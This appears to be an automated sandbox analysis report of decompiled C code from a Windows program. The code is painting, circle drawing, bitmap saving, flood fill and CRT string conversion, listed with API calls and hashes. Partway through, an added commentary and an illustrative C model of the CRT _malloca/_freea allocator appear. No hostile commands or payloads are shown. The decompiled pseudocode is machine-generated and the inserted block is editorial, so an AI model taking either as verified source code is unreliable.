                                              									E002FBE50(_t256, _v8, _t152, _t256, _v16, _v20, _t255, 0, 0, 0);
                                              								}
                                              							} else {
                                              								_t257 =  *0x304a00; // 0xffffff
                                              								_t154 =  *0x30598c; // 0x0
                                              								_t207 =  *0x305994; // 0x0
                                              								_t258 =  *0x305988; // 0x0
                                              								_t155 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t155, _t258, _t207, _t154, _t257, 0, 0, 0);
                                              								_t259 =  *0x304a00; // 0xffffff
                                              								_t260 =  *0x305988; // 0x0
                                              								_t158 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t158, _t260, _v16, _v20, _t259, 0, 0, 0);
                                              							}
                                              							L34:
                                              							 *0x305994 = _v16;
                                              							 *0x30598c = _v20;
                                              							ReleaseDC(_a4, _v8);
                                              							goto L35;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L28;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L34;
                                              						}
                                              						goto L28;
                                              					}
                                              					__eflags = _v16 -  *0x305994; // 0x0
                                              					if(__eflags != 0) {
                                              						L24:
                                              						_t160 =  *0x3059c0; // 0x12f0ef0
                                              						_t212 =  *0x304a00; // 0xffffff
                                              						_t213 =  *0x30598c; // 0x0
                                              						_t262 =  *0x305994; // 0x0
                                              						E002FBE50(_t262, _v8, _t262, _t213, _v16, _v20, _t212, _t160, 1, 0);
                                              						goto L34;
                                              					}
                                              					__eflags = _v20 -  *0x30598c; // 0x0
                                              					if(__eflags == 0) {
                                              						goto L25;
                                              					}
                                              					goto L24;
                                              				}
                                              				if(_v12 == 2) {
                                              					PostQuitMessage(0);
                                              					goto L55;
                                              				}
                                              				if(_v12 == 0xf) {
                                              					_v8 = BeginPaint(_a4,  &_v96);
                                              					_t214 =  *0x3059b0; // 0x12f0ef0
                                              					_v24 = _t214;
                                              					while(1) {
                                              						__eflags = 1;
                                              						if(1 == 0) {
                                              							break;
                                              						}
                                              						_v24 =  *((intOrPtr*)(_v24 + 8));
                                              						__eflags = _v24 -  *0x3059c4; // 0x12f1028
                                              						if(__eflags == 0) {
                                              							L51:
                                              							break;
                                              						}
                                              						_t168 =  *0x3059c0; // 0x12f0ef0
                                              						__eflags = _v24 -  *((intOrPtr*)(_t168 + 8));
                                              						if(_v24 !=  *((intOrPtr*)(_t168 + 8))) {
                                              							E002FC0F0(_v24, _a4);
                                              							continue;
                                              						}
                                              						goto L51;
                                              					}
                                              					EndPaint(_a4,  &_v96);
                                              				} else {
                                              				}
                                              			}
                                              0x002fd3af
                                              0x002fd3be
                                              0x00000000
                                              0x002fd3be
                                              0x002fd3b1
                                              0x002fd3b9
                                              0x002fd3bc
                                              0x002fd3ca
                                              0x00000000
                                              0x002fd3cf
                                              0x00000000
                                              0x002fd3bc
                                              0x002fd3d9
                                              0x00000000
                                              0x002fce66

                                              APIs
                                              • GetDC.USER32(00000200), ref: 002FD005
                                              • ReleaseDC.USER32 ref: 002FD228
                                              • PostQuitMessage.USER32(00000000), ref: 002FD372
                                              • BeginPaint.USER32(0000000F,?), ref: 002FD382
                                              • EndPaint.USER32(0000000F,?), ref: 002FD3D9
                                              • DefWindowProcW.USER32(00000201,?,?,?), ref: 002FD3EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Paint$BeginMessagePostProcQuitReleaseWindow
                                              • String ID:
                                              • API String ID: 76768696-0
                                              • Opcode ID: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction ID: f9d3ce9085b596cb68455e6053cb47681f63e8956b31e91e5b9020cdb8df749c
                                              • Opcode Fuzzy Hash: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction Fuzzy Hash: 1B02EAB5612508EFCB15CF99ECA4E7BB7BABB48750F10851AF309972A0C770A950CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB9D0(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _t176;
                                              
                                              				_v16 = 1 - _a16;
                                              				_v8 = 0;
                                              				_v12 = _a16;
                                              				_v20 = 3;
                                              				_t176 = 5 - (_a16 << 1);
                                              				_v24 = 5;
                                              				while(_v12 >= _v8) {
                                              					if(_a28 != 0) {
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 + _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 + _v12), _a20);
                                              					}
                                              					SetPixel(_a4, _a8 + _v8, _a12 + _v12, _a20);
                                              					SetPixel(_a4, _a8 + _v8, _a12 - _v12, _a20);
                                              					if(_v8 != _v12) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 + _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 + _v8, _a20);
                                              					}
                                              					if(_v8 != 0) {
                                              						SetPixel(_a4, _a8 - _v8, _a12 + _v12, _a20);
                                              						SetPixel(_a4, _a8 - _v8, _a12 - _v12, _a20);
                                              					}
                                              					if(_v8 != _v12 && _v8 != 0) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 - _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 - _v8, _a20);
                                              					}
                                              					if(_v16 >= 0) {
                                              						_v16 = _v16 + _v24;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 4;
                                              						_t176 = _v12 - 1;
                                              						_v12 = _t176;
                                              					} else {
                                              						_t176 = _v16 + _v20;
                                              						_v16 = _t176;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 2;
                                              					}
                                              					_v8 = _v8 + 1;
                                              				}
                                              				return _t176;
                                              			}
                                              0x002fb9de
                                              0x002fb9e1
                                              0x002fb9eb
                                              0x002fb9ee
                                              0x002fb9ff
                                              0x002fba01
                                              0x002fba04
                                              0x002fba14
                                              0x002fba50
                                              0x002fba8b
                                              0x002fbac6
                                              0x002fbb01
                                              0x002fbb3c
                                              0x002fbb77
                                              0x002fbbb2
                                              0x002fbbed
                                              0x002fbbed
                                              0x002fbc08
                                              0x002fbc24
                                              0x002fbc30
                                              0x002fbc48
                                              0x002fbc64
                                              0x002fbc64
                                              0x002fbc6e
                                              0x002fbc86
                                              0x002fbca2
                                              0x002fbca2
                                              0x002fbcae
                                              0x002fbccc
                                              0x002fbce8
                                              0x002fbce8
                                              0x002fbcf2
                                              0x002fbd17
                                              0x002fbd20
                                              0x002fbd29
                                              0x002fbd2f
                                              0x002fbd32
                                              0x002fbcf4
                                              0x002fbcf7
                                              0x002fbcfa
                                              0x002fbd03
                                              0x002fbd0c
                                              0x002fbd0c
                                              0x002fbd3b
                                              0x002fbd3b
                                              0x002fbd46

                                              APIs
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBA30
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBA6B
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBAA6
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBAE1
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB1C
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBB57
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB92
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBBCD
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC08
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC24
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC48
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC64
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC86
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBCA2
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCCC
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCE8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction ID: ff76207a708b271be82467342edb7cdf6b54f46a92851b53fe10a231f359e6ae
                                              • Opcode Fuzzy Hash: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction Fuzzy Hash: 1AD176B6510109EFCB04CFACD994DEFBBB9BF88350F108658FA1997254C630EA51DB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E002FB350(struct HBITMAP__* _a4, WCHAR* _a8) {
                                              				struct tagBITMAPINFO* _v8;
                                              				signed int _v12;
                                              				long _v16;
                                              				struct HDC__* _v20;
                                              				void* _v24;
                                              				signed int _v28;
                                              				long _v32;
                                              				intOrPtr _v38;
                                              				short _v40;
                                              				short _v42;
                                              				intOrPtr _v46;
                                              				void _v48;
                                              				signed short _v54;
                                              				signed short _v56;
                                              				int _v64;
                                              				signed int _v68;
                                              				void _v72;
                                              				struct HWND__* _v76;
                                              				struct HWND__* _v80;
                                              				struct HWND__* _v84;
                                              				struct HWND__* _v88;
                                              				signed int _v92;
                                              				struct HWND__* _v96;
                                              				signed int _v98;
                                              				short _v100;
                                              				int _v104;
                                              				signed int _v108;
                                              				void _v112;
                                              
                                              				_v20 = GetDC(0);
                                              				GetObjectW(_a4, 0x18,  &_v72);
                                              				_v112 = 0x28;
                                              				_v108 = _v68;
                                              				_v104 = _v64;
                                              				_v100 = 1;
                                              				_v98 = (_v56 & 0x0000ffff) * (_v54 & 0x0000ffff);
                                              				if((_v98 & 0x0000ffff) > 8) {
                                              					_v98 = 0x18;
                                              				}
                                              				_v96 = 0;
                                              				_v92 = 0;
                                              				_v88 = 0;
                                              				_v84 = 0;
                                              				_v80 = 0;
                                              				_v76 = 0;
                                              				if((_v98 & 0x0000ffff) != 0x18) {
                                              					_v28 = 1 << (_v98 & 0x0000ffff);
                                              				} else {
                                              					_v28 = 0;
                                              				}
                                              				_v12 = _v28 << 2;
                                              				_push(_v112 + _v12);
                                              				_v8 = E002F2487(_v112 + _v12);
                                              				memcpy(_v8,  &_v112, 0xa << 2);
                                              				GetDIBits(_v20, _a4, 0, _v64, 0, _v8, 0);
                                              				memcpy( &_v112, _v8, 0xa << 2);
                                              				if(_v92 == 0) {
                                              					_v92 = (((_v98 & 0x0000ffff) * _v108 + 0x0000001f & 0xffffffe0) >> 3) * _v104;
                                              				}
                                              				_v16 = _v112 + _v12 + _v92;
                                              				_push(_v16);
                                              				_push(_v8);
                                              				_v8 = E002F2477(_v112 + _v12 + _v92, _v16);
                                              				GetDIBits(_v20, _a4, 0, _v64, _v8 + _v112 + _v12, _v8, 0);
                                              				_v38 = _v12 + 0x36;
                                              				_v42 = 0;
                                              				_v40 = 0;
                                              				_v46 = _v16 + 0xe;
                                              				_v48 = 0x4d42;
                                              				_v24 = CreateFileW(_a8, 0x40000000, 0, 0, 2, 0x80, 0);
                                              				WriteFile(_v24,  &_v48, 0xe,  &_v32, 0);
                                              				WriteFile(_v24, _v8, _v16,  &_v32, 0);
                                              				ReleaseDC(0, _v20);
                                              				return CloseHandle(_v24);
                                              			}
                                              0x002fb360
                                              0x002fb36d
                                              0x002fb373
                                              0x002fb37d
                                              0x002fb383
                                              0x002fb38b
                                              0x002fb39a
                                              0x002fb3a5
                                              0x002fb3ac
                                              0x002fb3ac
                                              0x002fb3b0
                                              0x002fb3b7
                                              0x002fb3be
                                              0x002fb3c5
                                              0x002fb3cc
                                              0x002fb3d3
                                              0x002fb3e1
                                              0x002fb3f7
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb3e3
                                              0x002fb400
                                              0x002fb409
                                              0x002fb412
                                              0x002fb420
                                              0x002fb438
                                              0x002fb449
                                              0x002fb44f
                                              0x002fb466
                                              0x002fb466
                                              0x002fb472
                                              0x002fb478
                                              0x002fb47c
                                              0x002fb485
                                              0x002fb4a6
                                              0x002fb4b2
                                              0x002fb4b7
                                              0x002fb4bd
                                              0x002fb4c7
                                              0x002fb4cf
                                              0x002fb4ef
                                              0x002fb502
                                              0x002fb51a
                                              0x002fb526
                                              0x002fb53b

                                              APIs
                                              • GetDC.USER32(00000000), ref: 002FB35A
                                              • GetObjectW.GDI32(?,00000018,?), ref: 002FB36D
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 002FB438
                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 002FB4A6
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002FB4E9
                                              • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 002FB502
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002FB51A
                                              • ReleaseDC.USER32 ref: 002FB526
                                              • CloseHandle.KERNEL32(?), ref: 002FB530
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: File$BitsWrite$CloseCreateHandleObjectRelease
                                              • String ID: (
                                              • API String ID: 1864849596-3887548279
                                              • Opcode ID: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction ID: 99a353824dc3299d9dd34eefd8ceeed3b4ee44d0fb702dd5b19753f217b23ecc
                                              • Opcode Fuzzy Hash: dfcf794a157387090c46c0472e9066e23338345ce97ba9ab190e104e255db132
                                              • Instruction Fuzzy Hash: B46104B5E00208EBDB04CFD4D995BEEBBB5EF88700F108119E615BB294D775AA04CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 69%
                                              			E002F71BF(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                              				signed int _v8;
                                              				int _v12;
                                              				void* _v24;
                                              				signed int _t49;
                                              				signed int _t54;
                                              				int _t58;
                                              				signed int _t60;
                                              				short* _t62;
                                              				signed int _t66;
                                              				short* _t70;
                                              				int _t71;
                                              				int _t78;
                                              				short* _t81;
                                              				signed int _t87;
                                              				signed int _t90;
                                              				void* _t95;
                                              				void* _t96;
                                              				int _t98;
                                              				short* _t101;
                                              				int _t103;
                                              				signed int _t106;
                                              				short* _t107;
                                              				void* _t110;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t49 =  *0x304018; // 0x9021af28
                                              				_v8 = _t49 ^ _t106;
                                              				_push(__esi);
                                              				_t103 = _a20;
                                              				if(_t103 > 0) {
                                              					_t78 = E002F795F(_a16, _t103);
                                              					_t110 = _t78 - _t103;
                                              					_t4 = _t78 + 1; // 0x1
                                              					_t103 = _t4;
                                              					if(_t110 >= 0) {
                                              						_t103 = _t78;
                                              					}
                                              				}
                                              				_t98 = _a32;
                                              				if(_t98 == 0) {
                                              					_t98 =  *( *_a4 + 8);
                                              					_a32 = _t98;
                                              				}
                                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                              				_v12 = _t54;
                                              				if(_t54 == 0) {
                                              					L38:
                                              					return E002F19D1(_v8 ^ _t106);
                                              				} else {
                                              					_t95 = _t54 + _t54;
                                              					_t85 = _t95 + 8;
                                              					asm("sbb eax, eax");
                                              					if((_t95 + 0x00000008 & _t54) == 0) {
                                              						_t81 = 0;
                                              						__eflags = 0;
                                              						L14:
                                              						if(_t81 == 0) {
                                              							L36:
                                              							_t105 = 0;
                                              							L37:
                                              							E002F5CC8(_t81);
                                              							goto L38;
                                              						}
                                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                              						_t121 = _t58;
                                              						if(_t58 == 0) {
                                              							goto L36;
                                              						}
                                              						_t100 = _v12;
                                              						_t60 = E002F527C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                              						_t105 = _t60;
                                              						if(_t105 == 0) {
                                              							goto L36;
                                              						}
                                              						if((_a12 & 0x00000400) == 0) {
                                              							_t96 = _t105 + _t105;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							__eflags = _t87 & _t60;
                                              							if((_t87 & _t60) == 0) {
                                              								_t101 = 0;
                                              								__eflags = 0;
                                              								L30:
                                              								__eflags = _t101;
                                              								if(__eflags == 0) {
                                              									L35:
                                              									E002F5CC8(_t101);
                                              									goto L36;
                                              								}
                                              								_t62 = E002F527C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                              								__eflags = _t62;
                                              								if(_t62 == 0) {
                                              									goto L35;
                                              								}
                                              								_push(0);
                                              								_push(0);
                                              								__eflags = _a28;
                                              								if(_a28 != 0) {
                                              									_push(_a28);
                                              									_push(_a24);
                                              								} else {
                                              									_push(0);
                                              									_push(0);
                                              								}
                                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                              								__eflags = _t105;
                                              								if(_t105 != 0) {
                                              									E002F5CC8(_t101);
                                              									goto L37;
                                              								} else {
                                              									goto L35;
                                              								}
                                              							}
                                              							_t90 = _t96 + 8;
                                              							__eflags = _t96 - _t90;
                                              							asm("sbb eax, eax");
                                              							_t66 = _t60 & _t90;
                                              							_t87 = _t96 + 8;
                                              							__eflags = _t66 - 0x400;
                                              							if(_t66 > 0x400) {
                                              								__eflags = _t96 - _t87;
                                              								asm("sbb eax, eax");
                                              								_t101 = E002F3696(_t87, _t66 & _t87);
                                              								_pop(_t87);
                                              								__eflags = _t101;
                                              								if(_t101 == 0) {
                                              									goto L35;
                                              								}
                                              								 *_t101 = 0xdddd;
                                              								L28:
                                              								_t101 =  &(_t101[4]);
                                              								goto L30;
                                              							}
                                              							__eflags = _t96 - _t87;
                                              							asm("sbb eax, eax");
                                              							E002FA3A0();
                                              							_t101 = _t107;
                                              							__eflags = _t101;
                                              							if(_t101 == 0) {
                                              								goto L35;
                                              							}
                                              							 *_t101 = 0xcccc;
                                              							goto L28;
                                              						}
                                              						_t70 = _a28;
                                              						if(_t70 == 0) {
                                              							goto L37;
                                              						}
                                              						_t125 = _t105 - _t70;
                                              						if(_t105 > _t70) {
                                              							goto L36;
                                              						}
                                              						_t71 = E002F527C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                              						_t105 = _t71;
                                              						if(_t71 != 0) {
                                              							goto L37;
                                              						}
                                              						goto L36;
                                              					}
                                              					asm("sbb eax, eax");
                                              					_t72 = _t54 & _t95 + 0x00000008;
                                              					_t85 = _t95 + 8;
                                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                              						__eflags = _t95 - _t85;
                                              						asm("sbb eax, eax");
                                              						_t81 = E002F3696(_t85, _t72 & _t85);
                                              						_pop(_t85);
                                              						__eflags = _t81;
                                              						if(__eflags == 0) {
                                              							goto L36;
                                              						}
                                              						 *_t81 = 0xdddd;
                                              						L12:
                                              						_t81 =  &(_t81[4]);
                                              						goto L14;
                                              					}
                                              					asm("sbb eax, eax");
                                              					E002FA3A0();
                                              					_t81 = _t107;
                                              					if(_t81 == 0) {
                                              						goto L36;
                                              					}
                                              					 *_t81 = 0xcccc;
                                              					goto L12;
                                              				}
                                              			}

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,002F7410,?,?,00000000), ref: 002F7219
                                              • __alloca_probe_16.LIBCMT ref: 002F7251
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,002F7410,?,?,00000000,?,?,?), ref: 002F729F
                                              • __alloca_probe_16.LIBCMT ref: 002F7336
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002F7399
                                              • __freea.LIBCMT ref: 002F73A6
                                                • Part of subcall function 002F3696: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              • __freea.LIBCMT ref: 002F73AF
                                              • __freea.LIBCMT ref: 002F73D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: c11aaefb75d8848fc1a81ec80b12affd0d6809ef9fdfc52c38ef77af13631044
                                              • Instruction ID: 43bc0e9ba9128226248c9f989fd150a18c19126853d7f0b8dde60b7c5098216e
                                              • Opcode Fuzzy Hash: c11aaefb75d8848fc1a81ec80b12affd0d6809ef9fdfc52c38ef77af13631044
                                              • Instruction Fuzzy Hash: C851007262421FBBEB258E64CC42EBFB7AAEB44790B150279FE04D6150EB70DC609B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%
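The allocation and release branches in the function above (the size + 8 computation guarded by the `sbb eax, eax` / `and` idiom, the 0x400 threshold, the 0xcccc and 0xdddd markers written before the pointer is advanced by 8 bytes, and the `__freea` calls) are the MSVC CRT `_malloca`/`_freea` convention, and the surrounding MultiByteToWideChar / mapping call / WideCharToMultiByte sequence with the `_a12 & 0x400` (LCMAP_SORTKEY) test is consistent with the statically linked CRT helper `__crtLCMapStringA`, so this routine is runtime support code rather than sample-specific logic. The C below is an added example written for this report, not code from the sample or from the CRT, that models the `_malloca`/`_freea` decision so each branch can be checked: the stack branch is modelled with a static scratch buffer (an assumption standing in for `_alloca` / `__alloca_probe_16`), and the names `checked_marker_size`, `malloca_model`, `freea_model`, `malloca_branch` and `malloca_roundtrip` are invented for the example.

```c
/* Added example for this report, not code from the analysed sample or the CRT.
 * Models the MSVC CRT _malloca/_freea convention that the decompiled function
 * above inlines. The four constants are the documented CRT values. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ALLOCA_S_THRESHOLD    0x400u   /* 1024 bytes: larger requests go to the heap */
#define ALLOCA_S_MARKER_SIZE  8u       /* header in front of every block (the "+ 8" in the listing) */
#define ALLOCA_S_STACK_MARKER 0xCCCCu  /* "*_t81 = 0xcccc": block came from the stack */
#define ALLOCA_S_HEAP_MARKER  0xDDDDu  /* "*_t81 = 0xdddd": block came from the heap */

/* n + 8 with the "cmp / sbb eax,eax / and" idiom from the listing: the result
 * is 0 (treated as allocation failure) when the addition wraps around. */
uint32_t checked_marker_size(uint32_t n)
{
    uint32_t total = n + ALLOCA_S_MARKER_SIZE;
    uint32_t mask = (total < n) ? 0u : 0xFFFFFFFFu;  /* sbb eax,eax after the cmp */
    return total & mask;
}

/* Allocate n usable bytes. Assumption: the stack branch uses a caller-supplied
 * scratch buffer instead of _alloca / __alloca_probe_16. */
void *malloca_model(uint32_t n, void *stack_scratch, uint32_t scratch_len)
{
    uint32_t total = checked_marker_size(n);
    uint32_t *hdr;
    if (total == 0) return NULL;                      /* wrapped size: fail */
    if (total > ALLOCA_S_THRESHOLD) {
        hdr = (uint32_t *)malloc(total);              /* RtlAllocateHeap in the listing */
        if (hdr == NULL) return NULL;
        hdr[0] = ALLOCA_S_HEAP_MARKER;
    } else {
        if (scratch_len < total) return NULL;
        hdr = (uint32_t *)stack_scratch;
        hdr[0] = ALLOCA_S_STACK_MARKER;
    }
    return (char *)hdr + ALLOCA_S_MARKER_SIZE;        /* "_t81 = &(_t81[4])" on a 16-bit pointer */
}

/* __freea: step back over the header and free only heap-marked blocks.
 * Returns 1 when free() was called, 0 otherwise, so the decision is observable. */
int freea_model(void *p)
{
    uint32_t *hdr;
    if (p == NULL) return 0;
    hdr = (uint32_t *)((char *)p - ALLOCA_S_MARKER_SIZE);
    if (hdr[0] == ALLOCA_S_HEAP_MARKER) {
        free(hdr);
        return 1;
    }
    return 0;
}

/* Which branch a request of n bytes takes: 0 = fail, 1 = stack, 2 = heap. */
int malloca_branch(uint32_t n)
{
    uint32_t total = checked_marker_size(n);
    if (total == 0) return 0;
    return total > ALLOCA_S_THRESHOLD ? 2 : 1;
}

/* Allocate n bytes, record the marker the release path will see, use the
 * buffer, release it. Returns the marker, or 0 when allocation failed. */
uint32_t malloca_roundtrip(uint32_t n)
{
    static uint64_t scratch[ALLOCA_S_THRESHOLD / 8];  /* stands in for the stack frame */
    void *p = malloca_model(n, scratch, (uint32_t)sizeof scratch);
    uint32_t marker;
    if (p == NULL) return 0;
    marker = ((uint32_t *)((char *)p - ALLOCA_S_MARKER_SIZE))[0];
    memset(p, 0, n);                                  /* the usable region really is n bytes */
    freea_model(p);
    return marker;
}

int main(void)
{
    uint32_t sizes[] = { 0, 1016, 1017, 4096, 0xFFFFFFF8u };
    size_t i;
    for (i = 0; i < sizeof sizes / sizeof sizes[0]; i++)
        printf("n=%u branch=%d marker=0x%X\n", sizes[i],
               malloca_branch(sizes[i]), malloca_roundtrip(sizes[i]));
    return 0;
}
```

When triaging a report like this one, a function that shows this marker pattern together with `__alloca_probe_16` and `__freea` in its API list can be set aside as CRT boilerplate; the interesting sample logic is elsewhere.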

                                              C-Code - Quality: 100%
                                              			E002FC0F0(int _a4, struct HWND__* _a8) {
                                              				long* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				int _v20;
                                              				struct HBRUSH__* _v24;
                                              				void* _v28;
                                              				int _t41;
                                              
                                              				_t41 = _a4;
                                              				_v8 =  *_t41;
                                              				while(_v8 != 0) {
                                              					_v12 = GetDC(_a8);
                                              					_v20 = _v8[2];
                                              					_v16 = _v8[3];
                                              					if(_v20 < 0 || _v16 < 0) {
                                              						_v24 = CreateSolidBrush(_v8[1]);
                                              						_v28 = SelectObject(_v12, _v24);
                                              						ExtFloodFill(_v12,  *(_v8[4] + 8),  *(_v8[4] + 0xc),  *_v8, 1);
                                              						SelectObject(_v12, _v28);
                                              						return DeleteObject(_v12);
                                              					}
                                              					SetPixel(_v12, _v20, _v16, _v8[1]);
                                              					_v8 = _v8[4];
                                              					_t41 = ReleaseDC(_a8, _v12);
                                              				}
                                              				return _t41;
                                              			}

